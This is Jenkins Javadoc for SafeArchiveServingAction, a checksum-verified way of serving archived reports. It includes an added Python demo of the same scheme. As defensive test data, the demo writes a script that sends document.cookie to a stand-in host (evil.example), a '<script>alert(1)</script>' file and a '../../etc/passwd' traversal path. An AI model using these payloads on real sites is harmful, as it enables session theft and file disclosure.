Class SafeArchiveServingAction

  • All Implemented Interfaces:
    Action, ModelObject

    public class SafeArchiveServingAction
    extends Object
    implements Action
    This class implements a solution for serving reports that contain JavaScript, Flash, and similar active content from Jenkins. By default, Jenkins serves static files with a restrictive Content-Security-Policy header, so that a malicious user cannot attack other Jenkins users by getting Jenkins to serve them manipulated files. This presents an obstacle to plugins that wish to archive known-safe HTML reports and have Jenkins serve them; examples include the Maven Site functionality in the Maven Plugin and the Javadoc Plugin. This class implements a safe alternative to serving files through DirectoryBrowserSupport: when the action is first attached, it scans the specified directory and records a checksum for every file. When later asked to serve a file, it compares the file's actual checksum with the recorded one and serves the file only if they match. A file whose content changes after the scan therefore is not served, and a file with no recorded checksum has nothing to match against, so content added after the scan is not served either. The only exception is file types listed as safe in the constructor, which are served without verification.
    • Constructor Detail

      • SafeArchiveServingAction

        public SafeArchiveServingAction​(File rootDir,
                                        String urlName,
                                        String indexFile,
                                        String iconName,
                                        String title,
                                        String... safeExtensions)
        Create a safe archive serving action.
        rootDir - The root directory to be served by this action
        urlName - The URL name used for this action
        indexFile - The file name of the index file to be served when accessing the urlName URL
        iconName - The icon used for the action in the side panel
        title - The title of this action in the side panel
        safeExtensions - The file extensions to be skipped during checksum recording and verification. These are file types whose unauthorized modification does not put users at risk when viewed in a web browser: resource file extensions like "gif" or "png", or extensions of files that are not rendered by a browser at all, like "zip" or "gz". Never list file types that can contain scripts or other content able to exploit users' browsers (html, js, swf, css, …); such a file is served without any check, which defeats the purpose of this class.
    • Method Detail

      • processDirectory

        public void processDirectory()
                              throws NoSuchAlgorithmException,
                                     IOException
        Record the checksums of files in the specified directory and its descendants, unless a file type is whitelisted as safe via safeExtensions.
        NoSuchAlgorithmException - when the platform unexpectedly does not support SHA-1
        IOException - when the specified file or directory could not be accessed
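        The record-then-verify scheme described in the class description and in processDirectory, as an added stand-alone example. This is not Jenkins code and does not use the Jenkins API; it is a hypothetical re-implementation of the idea in Python (class SafeArchive, methods process_directory and serve, and the constructed sample archive in demo are all assumptions made here) that shows what the scheme does and does not protect against: a report file rewritten after the scan is refused, a file dropped in after the scan was never recorded and is refused, anything outside the archive root is refused, but a file whose extension is listed as safe is served unverified, which is why html, js, css, swf (and, in practice, svg) must never be listed.

```python
"""Stand-alone model of Jenkins' SafeArchiveServingAction idea (not the real class):
scan a directory once, record per-file checksums, and later serve a file only
if its current checksum matches the recorded one."""
import hashlib
import os
import tempfile
from pathlib import Path
from typing import Dict, Optional, Tuple


class SafeArchive:
    def __init__(self, root_dir, index_file="index.html", safe_extensions=()):
        self.root = Path(root_dir).resolve()
        self.index_file = index_file
        # Extensions without a leading dot, as in the constructor's "gif"/"png" examples.
        self.safe_extensions = {e.lower().lstrip(".") for e in safe_extensions}
        self.checksums: Dict[str, str] = {}

    def _is_safe_type(self, rel: str) -> bool:
        return Path(rel).suffix.lower().lstrip(".") in self.safe_extensions

    @staticmethod
    def _sha1(path: Path) -> str:
        # The Javadoc names SHA-1; a new design would use SHA-256, but the logic is identical.
        h = hashlib.sha1()
        with path.open("rb") as f:
            for chunk in iter(lambda: f.read(65536), b""):
                h.update(chunk)
        return h.hexdigest()

    def process_directory(self) -> int:
        """Record a checksum for every file under root, skipping safe-type files."""
        self.checksums = {}
        for dirpath, _dirs, files in os.walk(self.root):
            for name in files:
                p = Path(dirpath) / name
                rel = p.relative_to(self.root).as_posix()
                if not self._is_safe_type(rel):
                    self.checksums[rel] = self._sha1(p)
        return len(self.checksums)

    def serve(self, url_path: str) -> Tuple[int, Optional[bytes]]:
        """Return (HTTP status, body). 200 only for unmodified, recorded (or safe-type) files."""
        rel = url_path.strip("/") or self.index_file
        target = (self.root / rel).resolve()
        # Refuse anything that escapes the archive root, e.g. "../../etc/passwd".
        if self.root not in target.parents or not target.is_file():
            return 404, None
        rel = target.relative_to(self.root).as_posix()
        if self._is_safe_type(rel):
            return 200, target.read_bytes()   # served WITHOUT verification, by design
        expected = self.checksums.get(rel)
        if expected is None:
            return 404, None                  # never recorded: appeared after the scan
        if self._sha1(target) != expected:
            return 403, None                  # recorded, but content changed since
        return 200, target.read_bytes()


def demo() -> dict:
    """Constructed sample archive (not real data): a report, a script, an image, then tampering."""
    tmp = Path(tempfile.mkdtemp())
    (tmp / "index.html").write_text("<html><body>report</body></html>")
    (tmp / "js").mkdir()
    (tmp / "js" / "app.js").write_text("console.log('report');")
    (tmp / "logo.png").write_bytes(b"\x89PNG\r\n\x1a\n")

    archive = SafeArchive(tmp, index_file="index.html", safe_extensions=("png",))
    results = {"recorded": archive.process_directory()}   # png skipped -> 2 files
    results["index_before"] = archive.serve("/")[0]
    results["js_before"] = archive.serve("js/app.js")[0]

    # Someone rewrites the script after the scan (e.g. a later, untrusted build step).
    (tmp / "js" / "app.js").write_text("location='https://evil.example/?c='+document.cookie")
    results["js_after_tamper"] = archive.serve("js/app.js")[0]
    # A new HTML file dropped in after the scan was never recorded.
    (tmp / "new.html").write_text("<script>alert(1)</script>")
    results["unrecorded_file"] = archive.serve("new.html")[0]
    # A safe-type file is served even when modified: the reason the safe list must be narrow.
    (tmp / "logo.png").write_bytes(b"changed")
    results["png_after_tamper"] = archive.serve("logo.png")[0]
    results["traversal"] = archive.serve("../../etc/passwd")[0]
    return results


if __name__ == "__main__":
    print(demo())
```

        Note the asymmetry in the status codes: a recorded file whose content no longer matches is distinguishable (403) from a file that was never recorded or does not exist (404). Either way the tampered content never reaches the browser, which is the whole point of checking against the checksum taken at attach time rather than trusting whatever is on disk at request time.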
      • getRootDir

        public File getRootDir()
      • doDynamic

        public org.kohsuke.stapler.HttpResponse doDynamic​(org.kohsuke.stapler.StaplerRequest req,
                                                          org.kohsuke.stapler.StaplerResponse rsp)
                                                   throws IOException,